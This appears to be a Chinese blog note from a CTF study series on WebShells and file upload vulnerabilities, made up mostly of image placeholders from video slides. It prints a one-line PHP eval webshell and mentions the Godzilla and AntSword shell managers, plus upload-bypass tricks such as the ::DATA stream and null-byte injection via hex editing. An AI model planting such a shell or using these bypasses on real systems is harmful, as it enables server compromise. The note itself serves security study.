【ctf学习系列】WebShell与文件上传漏洞

说明

B站视频
该博客内容为B站视频所对应的ppt,仅作笔记使用,如有侵权,请联系处理~

课件内容

image.png

image.png

1
<?php @eval($_POST[x]);>

image.png

image.png

image.png

image.png
image.png

image.png

蚁剑不支持edu.cn,可以用哥斯拉Godzilla软件

image.png

image.png

image.png
image.png
image.png
image.png

image.png

image.png

image.png
image.png

image.png

010eidtor打开一个文件

image.png

image.png

image.png
image.png

image.png
image.png
::DATA 作为一个数据流

image.png

image.png

20改成00,会存在一个空字符

image.png
image.png

image.png
image.png

image.png

image.png
image.png

安装哥斯拉
burp中为什么没有render
常用的mime


【ctf学习系列】WebShell与文件上传漏洞
http://example.com/2023/08/24/ctf/【ctf学习系列】WebShell与文件上传漏洞/
作者
ningan123
发布于
2023年8月24日
许可协议